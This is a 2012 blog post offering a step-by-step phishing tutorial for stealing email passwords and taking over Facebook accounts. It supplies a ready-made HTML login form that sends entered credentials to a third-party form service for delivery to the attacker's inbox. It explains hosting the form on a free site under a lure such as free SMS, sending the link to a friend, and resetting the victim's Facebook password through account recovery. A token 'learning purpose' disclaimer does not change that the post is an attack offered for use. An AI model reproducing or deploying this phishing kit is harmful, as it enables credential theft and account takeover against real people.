বুধবার, ১১ জুলাই, ২০১২

How To Hack any Email Account or Facebook Password Easily!

Finally I have got the most easiest way to hack any email id password.

Do you want to hack anyone Facebook, Google+ or any other social networking sites username or password? Then it will enough to hack their email id and password. If you would able to hack and grab their email id and password once then you should be able to hack their any account that associated with this email address by using account recovery option.
I have seen lot of techniques like phishing, Key-logging, Server setup, etc about this topic, i mean how to hack a email account. I search on Google, there was a lot of articles about, this but all of those were so complicated. Finally i have got the most easiest way to hack any email id password.
Note: I am sharing this only to learning purpose. Do not use it to harm anyone.
Follow the steps:
1.  Go to link: http://www.formbuddy.com/
2.  Create an account [it’s free]
Formbuddy registration form
3. Now Copy this scripts on a Notepad:

</div>      <div style="background-color:#C8EBF9; padding: 
5px"><!--h--><form action="http://www.formbuddy.com/cgi-bin/form.pl"
 method="post"><!--h--><input type="hidden" name="username"
 value="ENTER YOUR FORMBUDDY USERNAME"><!--h--><input type="hidden"
 name="reqd" value="0"><!--h--><input type="hidden" name="url"
 value="http://gmail.com/sms.html">             <label>Your Email ID:</label>
 <input type="text" name="username" value="" /> 
<label>Password:</label>            <input type="password" name="password"
 value="" />            <label>            <input type="submit" name="submit
"value="Login" />

 4.  Find ‘ENTER YOUR FORM BUDDY USER NAME’ and replace with your username you just have created on ‘Form buddy.com’. Copy the whole things.
5.  Now create another account on this site: http://xtgem.com . (You can use a name like: make free call or send free sms worldwide to attract your friend and make him to log in here instantly)
6. Click ‘Create File’  and past that you copied from Notepad.
xtGem Acount Registration
Open Image In New Tab to see image Instructions!
7.  You are done. Now just give your  ‘xtgem.com’ site link to your friend and check your email inbox(email that you provided on ‘Formbuddy’)!!
hacked ID password
8.  After getting email account password. go to your friends Facebook account Log In and use email recovery to change the password. that's it. you hacked a Facebook account also!
Do you have any complicity with one of those steps? please leave it for me on comment box!

See also: Hack Any Password Protected Wi-Fi Network And Use Unlimited Free Internet !

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